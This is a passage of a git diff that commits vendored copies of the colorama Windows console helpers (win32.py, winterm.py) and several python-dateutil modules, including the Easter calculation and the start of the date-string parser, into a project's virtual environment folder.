+ +# from winbase.h +STDOUT = -11 +STDERR = -12 + +ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004 + +try: + import ctypes + from ctypes import LibraryLoader + windll = LibraryLoader(ctypes.WinDLL) + from ctypes import wintypes +except (AttributeError, ImportError): + windll = None + SetConsoleTextAttribute = lambda *_: None + winapi_test = lambda *_: None +else: + from ctypes import byref, Structure, c_char, POINTER + + COORD = wintypes._COORD + + class CONSOLE_SCREEN_BUFFER_INFO(Structure): + """struct in wincon.h.""" + _fields_ = [ + ("dwSize", COORD), + ("dwCursorPosition", COORD), + ("wAttributes", wintypes.WORD), + ("srWindow", wintypes.SMALL_RECT), + ("dwMaximumWindowSize", COORD), + ] + def __str__(self): + return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % ( + self.dwSize.Y, self.dwSize.X + , self.dwCursorPosition.Y, self.dwCursorPosition.X + , self.wAttributes + , self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right + , self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X + ) + + _GetStdHandle = windll.kernel32.GetStdHandle + _GetStdHandle.argtypes = [ + wintypes.DWORD, + ] + _GetStdHandle.restype = wintypes.HANDLE + + _GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo + _GetConsoleScreenBufferInfo.argtypes = [ + wintypes.HANDLE, + POINTER(CONSOLE_SCREEN_BUFFER_INFO), + ] + _GetConsoleScreenBufferInfo.restype = wintypes.BOOL + + _SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute + _SetConsoleTextAttribute.argtypes = [ + wintypes.HANDLE, + wintypes.WORD, + ] + _SetConsoleTextAttribute.restype = wintypes.BOOL + + _SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition + _SetConsoleCursorPosition.argtypes = [ + wintypes.HANDLE, + COORD, + ] + _SetConsoleCursorPosition.restype = wintypes.BOOL + + _FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA + _FillConsoleOutputCharacterA.argtypes = [ + wintypes.HANDLE, + c_char, + wintypes.DWORD, + COORD, + POINTER(wintypes.DWORD), + ] + _FillConsoleOutputCharacterA.restype = wintypes.BOOL + + _FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute + _FillConsoleOutputAttribute.argtypes = [ + wintypes.HANDLE, + wintypes.WORD, + wintypes.DWORD, + COORD, + POINTER(wintypes.DWORD), + ] + _FillConsoleOutputAttribute.restype = wintypes.BOOL + + _SetConsoleTitleW = windll.kernel32.SetConsoleTitleW + _SetConsoleTitleW.argtypes = [ + wintypes.LPCWSTR + ] + _SetConsoleTitleW.restype = wintypes.BOOL + + _GetConsoleMode = windll.kernel32.GetConsoleMode + _GetConsoleMode.argtypes = [ + wintypes.HANDLE, + POINTER(wintypes.DWORD) + ] + _GetConsoleMode.restype = wintypes.BOOL + + _SetConsoleMode = windll.kernel32.SetConsoleMode + _SetConsoleMode.argtypes = [ + wintypes.HANDLE, + wintypes.DWORD + ] + _SetConsoleMode.restype = wintypes.BOOL + + def _winapi_test(handle): + csbi = CONSOLE_SCREEN_BUFFER_INFO() + success = _GetConsoleScreenBufferInfo( + handle, byref(csbi)) + return bool(success) + + def winapi_test(): + return any(_winapi_test(h) for h in + (_GetStdHandle(STDOUT), _GetStdHandle(STDERR))) + + def GetConsoleScreenBufferInfo(stream_id=STDOUT): + handle = _GetStdHandle(stream_id) + csbi = CONSOLE_SCREEN_BUFFER_INFO() + success = _GetConsoleScreenBufferInfo( + handle, byref(csbi)) + return csbi + + def SetConsoleTextAttribute(stream_id, attrs): + handle = _GetStdHandle(stream_id) + return _SetConsoleTextAttribute(handle, attrs) + + def SetConsoleCursorPosition(stream_id, position, adjust=True): + position = COORD(*position) + # If the 
position is out of range, do nothing. + if position.Y <= 0 or position.X <= 0: + return + # Adjust for Windows' SetConsoleCursorPosition: + # 1. being 0-based, while ANSI is 1-based. + # 2. expecting (x,y), while ANSI uses (y,x). + adjusted_position = COORD(position.Y - 1, position.X - 1) + if adjust: + # Adjust for viewport's scroll position + sr = GetConsoleScreenBufferInfo(STDOUT).srWindow + adjusted_position.Y += sr.Top + adjusted_position.X += sr.Left + # Resume normal processing + handle = _GetStdHandle(stream_id) + return _SetConsoleCursorPosition(handle, adjusted_position) + + def FillConsoleOutputCharacter(stream_id, char, length, start): + handle = _GetStdHandle(stream_id) + char = c_char(char.encode()) + length = wintypes.DWORD(length) + num_written = wintypes.DWORD(0) + # Note that this is hard-coded for ANSI (vs wide) bytes. + success = _FillConsoleOutputCharacterA( + handle, char, length, start, byref(num_written)) + return num_written.value + + def FillConsoleOutputAttribute(stream_id, attr, length, start): + ''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )''' + handle = _GetStdHandle(stream_id) + attribute = wintypes.WORD(attr) + length = wintypes.DWORD(length) + num_written = wintypes.DWORD(0) + # Note that this is hard-coded for ANSI (vs wide) bytes. + return _FillConsoleOutputAttribute( + handle, attribute, length, start, byref(num_written)) + + def SetConsoleTitle(title): + return _SetConsoleTitleW(title) + + def GetConsoleMode(handle): + mode = wintypes.DWORD() + success = _GetConsoleMode(handle, byref(mode)) + if not success: + raise ctypes.WinError() + return mode.value + + def SetConsoleMode(handle, mode): + success = _SetConsoleMode(handle, mode) + if not success: + raise ctypes.WinError() diff --git a/env/Lib/site-packages/colorama/winterm.py b/env/Lib/site-packages/colorama/winterm.py new file mode 100644 index 00000000..aad867e8 --- /dev/null +++ b/env/Lib/site-packages/colorama/winterm.py @@ -0,0 +1,195 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +try: + from msvcrt import get_osfhandle +except ImportError: + def get_osfhandle(_): + raise OSError("This isn't windows!") + + +from . import win32 + +# from wincon.h +class WinColor(object): + BLACK = 0 + BLUE = 1 + GREEN = 2 + CYAN = 3 + RED = 4 + MAGENTA = 5 + YELLOW = 6 + GREY = 7 + +# from wincon.h +class WinStyle(object): + NORMAL = 0x00 # dim text, dim background + BRIGHT = 0x08 # bright text, dim background + BRIGHT_BACKGROUND = 0x80 # dim text, bright background + +class WinTerm(object): + + def __init__(self): + self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes + self.set_attrs(self._default) + self._default_fore = self._fore + self._default_back = self._back + self._default_style = self._style + # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style. + # So that LIGHT_EX colors and BRIGHT style do not clobber each other, + # we track them separately, since LIGHT_EX is overwritten by Fore/Back + # and BRIGHT is overwritten by Style codes. 
+ self._light = 0 + + def get_attrs(self): + return self._fore + self._back * 16 + (self._style | self._light) + + def set_attrs(self, value): + self._fore = value & 7 + self._back = (value >> 4) & 7 + self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND) + + def reset_all(self, on_stderr=None): + self.set_attrs(self._default) + self.set_console(attrs=self._default) + self._light = 0 + + def fore(self, fore=None, light=False, on_stderr=False): + if fore is None: + fore = self._default_fore + self._fore = fore + # Emulate LIGHT_EX with BRIGHT Style + if light: + self._light |= WinStyle.BRIGHT + else: + self._light &= ~WinStyle.BRIGHT + self.set_console(on_stderr=on_stderr) + + def back(self, back=None, light=False, on_stderr=False): + if back is None: + back = self._default_back + self._back = back + # Emulate LIGHT_EX with BRIGHT_BACKGROUND Style + if light: + self._light |= WinStyle.BRIGHT_BACKGROUND + else: + self._light &= ~WinStyle.BRIGHT_BACKGROUND + self.set_console(on_stderr=on_stderr) + + def style(self, style=None, on_stderr=False): + if style is None: + style = self._default_style + self._style = style + self.set_console(on_stderr=on_stderr) + + def set_console(self, attrs=None, on_stderr=False): + if attrs is None: + attrs = self.get_attrs() + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + win32.SetConsoleTextAttribute(handle, attrs) + + def get_position(self, handle): + position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition + # Because Windows coordinates are 0-based, + # and win32.SetConsoleCursorPosition expects 1-based. + position.X += 1 + position.Y += 1 + return position + + def set_cursor_position(self, position=None, on_stderr=False): + if position is None: + # I'm not currently tracking the position, so there is no default. + # position = self.get_position() + return + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + win32.SetConsoleCursorPosition(handle, position) + + def cursor_adjust(self, x, y, on_stderr=False): + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + position = self.get_position(handle) + adjusted_position = (position.Y + y, position.X + x) + win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False) + + def erase_screen(self, mode=0, on_stderr=False): + # 0 should clear from the cursor to the end of the screen. + # 1 should clear from the cursor to the beginning of the screen. 
+ # 2 should clear the entire screen, and move cursor to (1,1) + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + csbi = win32.GetConsoleScreenBufferInfo(handle) + # get the number of character cells in the current buffer + cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y + # get number of character cells before current cursor position + cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X + if mode == 0: + from_coord = csbi.dwCursorPosition + cells_to_erase = cells_in_screen - cells_before_cursor + elif mode == 1: + from_coord = win32.COORD(0, 0) + cells_to_erase = cells_before_cursor + elif mode == 2: + from_coord = win32.COORD(0, 0) + cells_to_erase = cells_in_screen + else: + # invalid mode + return + # fill the entire screen with blanks + win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) + # now set the buffer's attributes accordingly + win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) + if mode == 2: + # put the cursor where needed + win32.SetConsoleCursorPosition(handle, (1, 1)) + + def erase_line(self, mode=0, on_stderr=False): + # 0 should clear from the cursor to the end of the line. + # 1 should clear from the cursor to the beginning of the line. + # 2 should clear the entire line. + handle = win32.STDOUT + if on_stderr: + handle = win32.STDERR + csbi = win32.GetConsoleScreenBufferInfo(handle) + if mode == 0: + from_coord = csbi.dwCursorPosition + cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X + elif mode == 1: + from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) + cells_to_erase = csbi.dwCursorPosition.X + elif mode == 2: + from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) + cells_to_erase = csbi.dwSize.X + else: + # invalid mode + return + # fill the entire screen with blanks + win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) + # now set the buffer's attributes accordingly + win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) + + def set_title(self, title): + win32.SetConsoleTitle(title) + + +def enable_vt_processing(fd): + if win32.windll is None or not win32.winapi_test(): + return False + + try: + handle = get_osfhandle(fd) + mode = win32.GetConsoleMode(handle) + win32.SetConsoleMode( + handle, + mode | win32.ENABLE_VIRTUAL_TERMINAL_PROCESSING, + ) + + mode = win32.GetConsoleMode(handle) + if mode & win32.ENABLE_VIRTUAL_TERMINAL_PROCESSING: + return True + # Can get TypeError in testsuite where 'fd' is a Mock() + except (OSError, TypeError): + return False diff --git a/env/Lib/site-packages/dateutil/__init__.py b/env/Lib/site-packages/dateutil/__init__.py new file mode 100644 index 00000000..0defb82e --- /dev/null +++ b/env/Lib/site-packages/dateutil/__init__.py @@ -0,0 +1,8 @@ +# -*- coding: utf-8 -*- +try: + from ._version import version as __version__ +except ImportError: + __version__ = 'unknown' + +__all__ = ['easter', 'parser', 'relativedelta', 'rrule', 'tz', + 'utils', 'zoneinfo'] diff --git a/env/Lib/site-packages/dateutil/_common.py b/env/Lib/site-packages/dateutil/_common.py new file mode 100644 index 00000000..4eb2659b --- /dev/null +++ b/env/Lib/site-packages/dateutil/_common.py @@ -0,0 +1,43 @@ +""" +Common code used in multiple modules. 
+""" + + +class weekday(object): + __slots__ = ["weekday", "n"] + + def __init__(self, weekday, n=None): + self.weekday = weekday + self.n = n + + def __call__(self, n): + if n == self.n: + return self + else: + return self.__class__(self.weekday, n) + + def __eq__(self, other): + try: + if self.weekday != other.weekday or self.n != other.n: + return False + except AttributeError: + return False + return True + + def __hash__(self): + return hash(( + self.weekday, + self.n, + )) + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + s = ("MO", "TU", "WE", "TH", "FR", "SA", "SU")[self.weekday] + if not self.n: + return s + else: + return "%s(%+d)" % (s, self.n) + +# vim:ts=4:sw=4:et diff --git a/env/Lib/site-packages/dateutil/_version.py b/env/Lib/site-packages/dateutil/_version.py new file mode 100644 index 00000000..b723056a --- /dev/null +++ b/env/Lib/site-packages/dateutil/_version.py @@ -0,0 +1,5 @@ +# coding: utf-8 +# file generated by setuptools_scm +# don't change, don't track in version control +version = '2.8.2' +version_tuple = (2, 8, 2) diff --git a/env/Lib/site-packages/dateutil/easter.py b/env/Lib/site-packages/dateutil/easter.py new file mode 100644 index 00000000..f74d1f74 --- /dev/null +++ b/env/Lib/site-packages/dateutil/easter.py @@ -0,0 +1,89 @@ +# -*- coding: utf-8 -*- +""" +This module offers a generic Easter computing method for any given year, using +Western, Orthodox or Julian algorithms. +""" + +import datetime + +__all__ = ["easter", "EASTER_JULIAN", "EASTER_ORTHODOX", "EASTER_WESTERN"] + +EASTER_JULIAN = 1 +EASTER_ORTHODOX = 2 +EASTER_WESTERN = 3 + + +def easter(year, method=EASTER_WESTERN): + """ + This method was ported from the work done by GM Arts, + on top of the algorithm by Claus Tondering, which was + based in part on the algorithm of Ouding (1940), as + quoted in "Explanatory Supplement to the Astronomical + Almanac", P. Kenneth Seidelmann, editor. + + This algorithm implements three different Easter + calculation methods: + + 1. Original calculation in Julian calendar, valid in + dates after 326 AD + 2. Original method, with date converted to Gregorian + calendar, valid in years 1583 to 4099 + 3. Revised method, in Gregorian calendar, valid in + years 1583 to 4099 as well + + These methods are represented by the constants: + + * ``EASTER_JULIAN = 1`` + * ``EASTER_ORTHODOX = 2`` + * ``EASTER_WESTERN = 3`` + + The default method is method 3. 
+ + More about the algorithm may be found at: + + `GM Arts: Easter Algorithms `_ + + and + + `The Calendar FAQ: Easter `_ + + """ + + if not (1 <= method <= 3): + raise ValueError("invalid method") + + # g - Golden year - 1 + # c - Century + # h - (23 - Epact) mod 30 + # i - Number of days from March 21 to Paschal Full Moon + # j - Weekday for PFM (0=Sunday, etc) + # p - Number of days from March 21 to Sunday on or before PFM + # (-6 to 28 methods 1 & 3, to 56 for method 2) + # e - Extra days to add for method 2 (converting Julian + # date to Gregorian date) + + y = year + g = y % 19 + e = 0 + if method < 3: + # Old method + i = (19*g + 15) % 30 + j = (y + y//4 + i) % 7 + if method == 2: + # Extra dates to convert Julian to Gregorian date + e = 10 + if y > 1600: + e = e + y//100 - 16 - (y//100 - 16)//4 + else: + # New method + c = y//100 + h = (c - c//4 - (8*c + 13)//25 + 19*g + 15) % 30 + i = h - (h//28)*(1 - (h//28)*(29//(h + 1))*((21 - g)//11)) + j = (y + y//4 + i + 2 - c + c//4) % 7 + + # p can be from -6 to 56 corresponding to dates 22 March to 23 May + # (later dates apply to method 2, although 23 May never actually occurs) + p = i - j + e + d = 1 + (p + 27 + (p + 6)//40) % 31 + m = 3 + (p + 26)//30 + return datetime.date(int(y), int(m), int(d)) diff --git a/env/Lib/site-packages/dateutil/parser/__init__.py b/env/Lib/site-packages/dateutil/parser/__init__.py new file mode 100644 index 00000000..d174b0e4 --- /dev/null +++ b/env/Lib/site-packages/dateutil/parser/__init__.py @@ -0,0 +1,61 @@ +# -*- coding: utf-8 -*- +from ._parser import parse, parser, parserinfo, ParserError +from ._parser import DEFAULTPARSER, DEFAULTTZPARSER +from ._parser import UnknownTimezoneWarning + +from ._parser import __doc__ + +from .isoparser import isoparser, isoparse + +__all__ = ['parse', 'parser', 'parserinfo', + 'isoparse', 'isoparser', + 'ParserError', + 'UnknownTimezoneWarning'] + + +### +# Deprecate portions of the private interface so that downstream code that +# is improperly relying on it is given *some* notice. 
+ + +def __deprecated_private_func(f): + from functools import wraps + import warnings + + msg = ('{name} is a private function and may break without warning, ' + 'it will be moved and or renamed in future versions.') + msg = msg.format(name=f.__name__) + + @wraps(f) + def deprecated_func(*args, **kwargs): + warnings.warn(msg, DeprecationWarning) + return f(*args, **kwargs) + + return deprecated_func + +def __deprecate_private_class(c): + import warnings + + msg = ('{name} is a private class and may break without warning, ' + 'it will be moved and or renamed in future versions.') + msg = msg.format(name=c.__name__) + + class private_class(c): + __doc__ = c.__doc__ + + def __init__(self, *args, **kwargs): + warnings.warn(msg, DeprecationWarning) + super(private_class, self).__init__(*args, **kwargs) + + private_class.__name__ = c.__name__ + + return private_class + + +from ._parser import _timelex, _resultbase +from ._parser import _tzparser, _parsetz + +_timelex = __deprecate_private_class(_timelex) +_tzparser = __deprecate_private_class(_tzparser) +_resultbase = __deprecate_private_class(_resultbase) +_parsetz = __deprecated_private_func(_parsetz) diff --git a/env/Lib/site-packages/dateutil/parser/_parser.py b/env/Lib/site-packages/dateutil/parser/_parser.py new file mode 100644 index 00000000..37d1663b --- /dev/null +++ b/env/Lib/site-packages/dateutil/parser/_parser.py @@ -0,0 +1,1613 @@ +# -*- coding: utf-8 -*- +""" +This module offers a generic date/time string parser which is able to parse +most known formats to represent a date and/or time. + +This module attempts to be forgiving with regards to unlikely input formats, +returning a datetime object even for dates which are ambiguous. If an element +of a date/time stamp is omitted, the following rules are applied: + +- If AM or PM is left unspecified, a 24-hour clock is assumed, however, an hour + on a 12-hour clock (``0 <= hour <= 12``) *must* be specified if AM or PM is + specified. +- If a time zone is omitted, a timezone-naive datetime is returned. + +If any other elements are missing, they are taken from the +:class:`datetime.datetime` object passed to the parameter ``default``. If this +results in a day number exceeding the valid number of days per month, the +value falls back to the end of the month. + +Additional resources about date/time string formats can be found below: + +- `A summary of the international standard date and time notation + `_ +- `W3C Date and Time Formats `_ +- `Time Formats (Planetary Rings Node) `_ +- `CPAN ParseDate module + `_ +- `Java SimpleDateFormat Class + `_ +""" +from __future__ import unicode_literals + +import datetime +import re +import string +import time +import warnings + +from calendar import monthrange +from io import StringIO + +import six +from six import integer_types, text_type + +from decimal import Decimal + +from warnings import warn + +from .. import relativedelta +from .. import tz + +__all__ = ["parse", "parserinfo", "ParserError"] + + +# TODO: pandas.core.tools.datetimes imports this explicitly. Might be worth +# making public and/or figuring out if there is something we can +# take off their plate. 
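+# Illustrative usage sketch (not from the upstream dateutil source): the
+# classes below back the public ``parse()`` entry point that
+# ``dateutil.parser`` re-exports. The expected results follow the project's
+# own documented examples:
+#
+#     >>> from dateutil import parser
+#     >>> parser.parse("2003-09-25T10:49:41")
+#     datetime.datetime(2003, 9, 25, 10, 49, 41)
+#     >>> parser.parse("Thu Sep 25 2003")
+#     datetime.datetime(2003, 9, 25, 0, 0)
+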
+class _timelex(object): + # Fractional seconds are sometimes split by a comma + _split_decimal = re.compile("([.,])") + + def __init__(self, instream): + if isinstance(instream, (bytes, bytearray)): + instream = instream.decode() + + if isinstance(instream, text_type): + instream = StringIO(instream) + elif getattr(instream, 'read', None) is None: + raise TypeError('Parser must be a string or character stream, not ' + '{itype}'.format(itype=instream.__class__.__name__)) + + self.instream = instream + self.charstack = [] + self.tokenstack = [] + self.eof = False + + def get_token(self): + """ + This function breaks the time string into lexical units (tokens), which + can be parsed by the parser. Lexical units are demarcated by changes in + the character set, so any continuous string of letters is considered + one unit, any continuous string of numbers is considered one unit. + + The main complication arises from the fact that dots ('.') can be used + both as separators (e.g. "Sep.20.2009") or decimal points (e.g. + "4:30:21.447"). As such, it is necessary to read the full context of + any dot-separated strings before breaking it into tokens; as such, this + function maintains a "token stack", for when the ambiguous context + demands that multiple tokens be parsed at once. + """ + if self.tokenstack: + return self.tokenstack.pop(0) + + seenletters = False + token = None + state = None + + while not self.eof: + # We only realize that we've reached the end of a token when we + # find a character that's not part of the current token - since + # that character may be part of the next token, it's stored in the + # charstack. + if self.charstack: + nextchar = self.charstack.pop(0) + else: + nextchar = self.instream.read(1) + while nextchar == '\x00': + nextchar = self.instream.read(1) + + if not nextchar: + self.eof = True + break + elif not state: + # First character of the token - determines if we're starting + # to parse a word, a number or something else. + token = nextchar + if self.isword(nextchar): + state = 'a' + elif self.isnum(nextchar): + state = '0' + elif self.isspace(nextchar): + token = ' ' + break # emit token + else: + break # emit token + elif state == 'a': + # If we've already started reading a word, we keep reading + # letters until we find something that's not part of a word. + seenletters = True + if self.isword(nextchar): + token += nextchar + elif nextchar == '.': + token += nextchar + state = 'a.' + else: + self.charstack.append(nextchar) + break # emit token + elif state == '0': + # If we've already started reading a number, we keep reading + # numbers until we find something that doesn't fit. + if self.isnum(nextchar): + token += nextchar + elif nextchar == '.' or (nextchar == ',' and len(token) >= 2): + token += nextchar + state = '0.' + else: + self.charstack.append(nextchar) + break # emit token + elif state == 'a.': + # If we've seen some letters and a dot separator, continue + # parsing, and the tokens will be broken up later. + seenletters = True + if nextchar == '.' or self.isword(nextchar): + token += nextchar + elif self.isnum(nextchar) and token[-1] == '.': + token += nextchar + state = '0.' + else: + self.charstack.append(nextchar) + break # emit token + elif state == '0.': + # If we've seen at least one dot separator, keep going, we'll + # break up the tokens later. + if nextchar == '.' or self.isnum(nextchar): + token += nextchar + elif self.isword(nextchar) and token[-1] == '.': + token += nextchar + state = 'a.' 
+ else: + self.charstack.append(nextchar) + break # emit token + + if (state in ('a.', '0.') and (seenletters or token.count('.') > 1 or + token[-1] in '.,')): + l = self._split_decimal.split(token) + token = l[0] + for tok in l[1:]: + if tok: + self.tokenstack.append(tok) + + if state == '0.' and token.count('.') == 0: + token = token.replace(',', '.') + + return token + + def __iter__(self): + return self + + def __next__(self): + token = self.get_token() + if token is None: + raise StopIteration + + return token + + def next(self): + return self.__next__() # Python 2.x support + + @classmethod + def split(cls, s): + return list(cls(s)) + + @classmethod + def isword(cls, nextchar): + """ Whether or not the next character is part of a word """ + return nextchar.isalpha() + + @classmethod + def isnum(cls, nextchar): + """ Whether the next character is part of a number """ + return nextchar.isdigit() + + @classmethod + def isspace(cls, nextchar): + """ Whether the next character is whitespace """ + return nextchar.isspace() + + +class _resultbase(object): + + def __init__(self): + for attr in self.__slots__: + setattr(self, attr, None) + + def _repr(self, classname): + l = [] + for attr in self.__slots__: + value = getattr(self, attr) + if value is not None: + l.append("%s=%s" % (attr, repr(value))) + return "%s(%s)" % (classname, ", ".join(l)) + + def __len__(self): + return (sum(getattr(self, attr) is not None + for attr in self.__slots__)) + + def __repr__(self): + return self._repr(self.__class__.__name__) + + +class parserinfo(object): + """ + Class which handles what inputs are accepted. Subclass this to customize + the language and acceptable values for each parameter. + + :param dayfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the day (``True``) or month (``False``). If + ``yearfirst`` is set to ``True``, this distinguishes between YDM + and YMD. Default is ``False``. + + :param yearfirst: + Whether to interpret the first value in an ambiguous 3-integer date + (e.g. 01/05/09) as the year. If ``True``, the first number is taken + to be the year, otherwise the last number is taken to be the year. + Default is ``False``. 
+ """ + + # m from a.m/p.m, t from ISO T separator + JUMP = [" ", ".", ",", ";", "-", "/", "'", + "at", "on", "and", "ad", "m", "t", "of", + "st", "nd", "rd", "th"] + + WEEKDAYS = [("Mon", "Monday"), + ("Tue", "Tuesday"), # TODO: "Tues" + ("Wed", "Wednesday"), + ("Thu", "Thursday"), # TODO: "Thurs" + ("Fri", "Friday"), + ("Sat", "Saturday"), + ("Sun", "Sunday")] + MONTHS = [("Jan", "January"), + ("Feb", "February"), # TODO: "Febr" + ("Mar", "March"), + ("Apr", "April"), + ("May", "May"), + ("Jun", "June"), + ("Jul", "July"), + ("Aug", "August"), + ("Sep", "Sept", "September"), + ("Oct", "October"), + ("Nov", "November"), + ("Dec", "December")] + HMS = [("h", "hour", "hours"), + ("m", "minute", "minutes"), + ("s", "second", "seconds")] + AMPM = [("am", "a"), + ("pm", "p")] + UTCZONE = ["UTC", "GMT", "Z", "z"] + PERTAIN = ["of"] + TZOFFSET = {} + # TODO: ERA = ["AD", "BC", "CE", "BCE", "Stardate", + # "Anno Domini", "Year of Our Lord"] + + def __init__(self, dayfirst=False, yearfirst=False): + self._jump = self._convert(self.JUMP) + self._weekdays = self._convert(self.WEEKDAYS) + self._months = self._convert(self.MONTHS) + self._hms = self._convert(self.HMS) + self._ampm = self._convert(self.AMPM) + self._utczone = self._convert(self.UTCZONE) + self._pertain = self._convert(self.PERTAIN) + + self.dayfirst = dayfirst + self.yearfirst = yearfirst + + self._year = time.localtime().tm_year + self._century = self._year // 100 * 100 + + def _convert(self, lst): + dct = {} + for i, v in enumerate(lst): + if isinstance(v, tuple): + for v in v: + dct[v.lower()] = i + else: + dct[v.lower()] = i + return dct + + def jump(self, name): + return name.lower() in self._jump + + def weekday(self, name): + try: + return self._weekdays[name.lower()] + except KeyError: + pass + return None + + def month(self, name): + try: + return self._months[name.lower()] + 1 + except KeyError: + pass + return None + + def hms(self, name): + try: + return self._hms[name.lower()] + except KeyError: + return None + + def ampm(self, name): + try: + return self._ampm[name.lower()] + except KeyError: + return None + + def pertain(self, name): + return name.lower() in self._pertain + + def utczone(self, name): + return name.lower() in self._utczone + + def tzoffset(self, name): + if name in self._utczone: + return 0 + + return self.TZOFFSET.get(name) + + def convertyear(self, year, century_specified=False): + """ + Converts two-digit years to year within [-50, 49] + range of self._year (current local time) + """ + + # Function contract is that the year is always positive + assert year >= 0 + + if year < 100 and not century_specified: + # assume current century to start + year += self._century + + if year >= self._year + 50: # if too far in future + year -= 100 + elif year < self._year - 50: # if too far in past + year += 100 + + return year + + def validate(self, res): + # move to info + if res.year is not None: + res.year = self.convertyear(res.year, res.century_specified) + + if ((res.tzoffset == 0 and not res.tzname) or + (res.tzname == 'Z' or res.tzname == 'z')): + res.tzname = "UTC" + res.tzoffset = 0 + elif res.tzoffset != 0 and res.tzname and self.utczone(res.tzname): + res.tzoffset = 0 + return True + + +class _ymd(list): + def __init__(self, *args, **kwargs): + super(self.__class__, self).__init__(*args, **kwargs) + self.century_specified = False + self.dstridx = None + self.mstridx = None + self.ystridx = None + + @property + def has_year(self): + return self.ystridx is not None + + @property + def has_month(self): + 
return self.mstridx is not None + + @property + def has_day(self): + return self.dstridx is not None + + def could_be_day(self, value): + if self.has_day: + return False + elif not self.has_month: + return 1 <= value <= 31 + elif not self.has_year: + # Be permissive, assume leap year + month = self[self.mstridx] + return 1 <= value <= monthrange(2000, month)[1] + else: + month = self[self.mstridx] + year = self[self.ystridx] + return 1 <= value <= monthrange(year, month)[1] + + def append(self, val, label=None): + if hasattr(val, '__len__'): + if val.isdigit() and len(val) > 2: + self.century_specified = True + if label not in [None, 'Y']: # pragma: no cover + raise ValueError(label) + label = 'Y' + elif val > 100: + self.century_specified = True + if label not in [None, 'Y']: # pragma: no cover + raise ValueError(label) + label = 'Y' + + super(self.__class__, self).append(int(val)) + + if label == 'M': + if self.has_month: + raise ValueError('Month is already set') + self.mstridx = len(self) - 1 + elif label == 'D': + if self.has_day: + raise ValueError('Day is already set') + self.dstridx = len(self) - 1 + elif label == 'Y': + if self.has_year: + raise ValueError('Year is already set') + self.ystridx = len(self) - 1 + + def _resolve_from_stridxs(self, strids): + """ + Try to resolve the identities of year/month/day elements using + ystridx, mstridx, and dstridx, if enough of these are specified. + """ + if len(self) == 3 and len(strids) == 2: + # we can back out the remaining stridx value + missing = [x for x in range(3) if x not in strids.values()] + key = [x for x in ['y', 'm', 'd'] if x not in strids] + assert len(missing) == len(key) == 1 + key = key[0] + val = missing[0] + strids[key] = val + + assert len(self) == len(strids) # otherwise this should not be called + out = {key: self[strids[key]] for key in strids} + return (out.get('y'), out.get('m'), out.get('d')) + + def resolve_ymd(self, yearfirst, dayfirst): + len_ymd = len(self) + year, month, day = (None, None, None) + + strids = (('y', self.ystridx), + ('m', self.mstridx), + ('d', self.dstridx)) + + strids = {key: val for key, val in strids if val is not None} + if (len(self) == len(strids) > 0 or + (len(self) == 3 and len(strids) == 2)): + return self._resolve_from_stridxs(strids) + + mstridx = self.mstridx + + if len_ymd > 3: + raise ValueError("More than three YMD values") + elif len_ymd == 1 or (mstridx is not None and len_ymd == 2): + # One member, or two members with a month string + if mstridx is not None: + month = self[mstridx] + # since mstridx is 0 or 1, self[mstridx-1] always + # looks up the other element + other = self[mstridx - 1] + else: + other = self[0] + + if len_ymd > 1 or mstridx is None: + if other > 31: + year = other + else: + day = other + + elif len_ymd == 2: + # Two members with numbers + if self[0] > 31: + # 99-01 + year, month = self + elif self[1] > 31: + # 01-99 + month, year = self + elif dayfirst and self[1] <= 12: + # 13-01 + day, month = self + else: + # 01-13 + month, day = self + + elif len_ymd == 3: + # Three members + if mstridx == 0: + if self[1] > 31: + # Apr-2003-25 + month, year, day = self + else: + month, day, year = self + elif mstridx == 1: + if self[0] > 31 or (yearfirst and self[2] <= 31): + # 99-Jan-01 + year, month, day = self + else: + # 01-Jan-01 + # Give precedence to day-first, since + # two-digit years is usually hand-written. + day, month, year = self + + elif mstridx == 2: + # WTF!? 
